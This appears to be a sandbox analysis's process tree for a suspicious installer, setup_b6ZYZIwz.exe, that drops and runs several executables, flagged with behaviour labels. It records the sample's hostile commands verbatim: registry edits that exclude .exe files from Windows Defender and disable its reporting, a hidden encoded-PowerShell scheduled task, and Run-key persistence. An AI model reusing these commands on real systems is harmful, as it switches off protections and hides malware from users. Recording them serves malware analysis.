"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=6464 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=6436 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6824 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:5096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3200 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6700 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=6880 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=3332 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=2908 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=6604 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6832 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=4636 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6372 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=6876 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:4156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=2784 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=3220 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=4468 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=3272 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:2088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=6200 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:1052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=5576 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:1
2⤵
PID:3584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1816,i,10302546674236354671,8791541103610884739,131072 /prefetch:8
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3308

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4608

C:\Users\Admin\Desktop\setup_b6ZYZIwz.exe
"C:\Users\Admin\Desktop\setup_b6ZYZIwz.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3644

C:\Users\Admin\AppData\Local\Temp\is-PLEFV.tmp\is-VPF07.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PLEFV.tmp\is-VPF07.tmp" /SL4 $30294 "C:\Users\Admin\Desktop\setup_b6ZYZIwz.exe" 4456304 56320
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1272

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 29
3⤵
PID:4260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 29
4⤵
PID:2248

C:\Program Files (x86)\ImageComparer\IC44.exe
"C:\Program Files (x86)\ImageComparer\IC44.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 896
4⤵
- Program crash
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 916
4⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1116
4⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 140
4⤵
- Program crash
PID:4064

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause ImageComparer44
3⤵
PID:4488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause ImageComparer44
4⤵
PID:4712

C:\Program Files (x86)\ImageComparer\IC44.exe
"C:\Program Files (x86)\ImageComparer\IC44.exe" de847eeab513a908712259bac07565fc
3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 880
4⤵
- Program crash
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 888
4⤵
- Program crash
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 956
4⤵
- Program crash
PID:3168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1084
4⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1092
4⤵
- Program crash
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1108
4⤵
- Program crash
PID:1716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1124
4⤵
- Program crash
PID:332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1332
4⤵
- Program crash
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1340
4⤵
- Program crash
PID:1816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 996
4⤵
- Program crash
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 968
4⤵
- Program crash
PID:2512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1704
4⤵
- Program crash
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1368
4⤵
- Program crash
PID:1600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1700
4⤵
- Program crash
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1812
4⤵
- Program crash
PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1780
4⤵
- Program crash
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1892
4⤵
- Program crash
PID:3212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1824
4⤵
- Program crash
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1928
4⤵
- Program crash
PID:1680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1836
4⤵
- Program crash
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1928
4⤵
- Program crash
PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1816
4⤵
- Program crash
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2024
4⤵
- Program crash
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1840
4⤵
- Program crash
PID:236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1472
4⤵
- Program crash
PID:2608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2092
4⤵
- Program crash
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2064
4⤵
- Program crash
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1840
4⤵
- Program crash
PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1760
4⤵
- Program crash
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1964
4⤵
- Program crash
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2144
4⤵
- Program crash
PID:3768

C:\Users\Admin\AppData\Local\Temp\jST1PtQQ\afvJQ8Vb.exe
C:\Users\Admin\AppData\Local\Temp\jST1PtQQ\afvJQ8Vb.exe /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328

C:\Users\Admin\AppData\Local\Temp\is-8FON4.tmp\is-LQ960.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8FON4.tmp\is-LQ960.tmp" /SL4 $1402C2 "C:\Users\Admin\AppData\Local\Temp\jST1PtQQ\afvJQ8Vb.exe" 2215905 52736 /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:732

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 9
6⤵
PID:3056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 9
7⤵
PID:1716

C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" install
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:816

C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" start
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3716

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause Zerkalo331
6⤵
PID:2168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause Zerkalo331
7⤵
PID:2112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1472
4⤵
- Program crash
PID:4464

C:\Users\Admin\AppData\Local\Temp\sml8O4Yf\0HW768fG3olr.exe
C:\Users\Admin\AppData\Local\Temp\sml8O4Yf\0HW768fG3olr.exe /S /site_id=690689
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4384

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:2416

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:2916

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:2804

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:2952

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:5060

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:1008

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:2608

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:3008

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEnbYDNqR" /SC once /ST 16:45:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:4588

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEnbYDNqR"
5⤵
PID:332

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEnbYDNqR"
5⤵
PID:3328

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPLWYbEmiNLoeLgDZO" /SC once /ST 23:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\WGazEahxDSJaqMe\nohHFDg.exe\" cw /site_id 690689 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:2768

C:\Users\Admin\AppData\Local\Temp\VidGwTKp\Eeif6JOgRWUZxkt.exe
C:\Users\Admin\AppData\Local\Temp\VidGwTKp\Eeif6JOgRWUZxkt.exe /m SUB=de847eeab513a908712259bac07565fc
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Users\Admin\AppData\Local\Temp\is-E3AP2.tmp\is-24570.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E3AP2.tmp\is-24570.tmp" /SL4 $103F6 "C:\Users\Admin\AppData\Local\Temp\VidGwTKp\Eeif6JOgRWUZxkt.exe" 1365942 52736 /m SUB=de847eeab513a908712259bac07565fc
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2464

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 24
6⤵
PID:4652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 24
7⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\is-NVJJN.tmp\FileDate44\FileDate44.exe
"C:\Users\Admin\AppData\Local\Temp\is-NVJJN.tmp\FileDate44\FileDate44.exe" /m SUB=de847eeab513a908712259bac07565fc
6⤵
PID:3808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate44.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-NVJJN.tmp\FileDate44\FileDate44.exe" & exit
7⤵
PID:2776

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FileDate44.exe" /f
8⤵
- Kills process with taskkill
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2156
4⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2064
4⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2184
4⤵
- Program crash
PID:384

C:\Users\Admin\AppData\Local\Temp\56KDxN2f\kKXIb9fN89vd9isuw6.exe
C:\Users\Admin\AppData\Local\Temp\56KDxN2f\kKXIb9fN89vd9isuw6.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4336

C:\Users\Admin\AppData\Local\Temp\is-18AVL.tmp\is-40LCD.tmp
"C:\Users\Admin\AppData\Local\Temp\is-18AVL.tmp\is-40LCD.tmp" /SL4 $3042A "C:\Users\Admin\AppData\Local\Temp\56KDxN2f\kKXIb9fN89vd9isuw6.exe" 1931278 48640
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4076

C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe
"C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2144
4⤵
- Program crash
PID:2948

C:\Users\Admin\AppData\Local\Temp\15WFNEhO\T5x5yJ8fvDw42wmDC6l.exe
C:\Users\Admin\AppData\Local\Temp\15WFNEhO\T5x5yJ8fvDw42wmDC6l.exe /sid=9 /pid=449 /lid=de847eeab513a908712259bac07565fc
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2336

C:\Users\Admin\AppData\Roaming\toc\FlKR.exe
C:\Users\Admin\AppData\Roaming\toc\FlKR.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4076

C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe
"C:\Users\Admin\AppData\Roaming\toc\ZxeJj.exe"
6⤵
- Executes dropped EXE
PID:3740

C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe
"C:\Users\Admin\AppData\Roaming\toc\chromedriver.exe" --port=51928
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4868

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --allow-pre-commit-input --check-for-update-interval=1800 --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --lang=sv --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=9371 --start-maximized --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1. 38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\\tocfd76c347-9e8b-4e59-9009-9886b6af54a5"
8⤵
- Checks computer location settings
- Executes dropped EXE
PID:3324

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tocfd76c347-9e8b-4e59-9009-9886b6af54a5 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tocfd76c347-9e8b-4e59-9009-9886b6af54a5\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=102.0.5005.63 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x727d8518,0x727d8528,0x727d8534
9⤵
- Executes dropped EXE
PID:3168

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1. 38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --enable-logging --log-level=0 --mojo-platform-channel-handle=1476 --field-trial-handle=1516,i,8072632670263732563,6760705564254250393,131072 --disable-features=PaintHolding /prefetch:2
9⤵
- Executes dropped EXE
PID:3152

C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe
"C:\Users\Admin\AppData\Roaming\toc\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=sv --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1. 38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1" --enable-logging --log-level=0 --mojo-platform-channel-handle=1656 --field-trial-handle=1516,i,8072632670263732563,6760705564254250393,131072 --disable-features=PaintHolding /prefetch:8
9⤵
- Executes dropped EXE
PID:1516

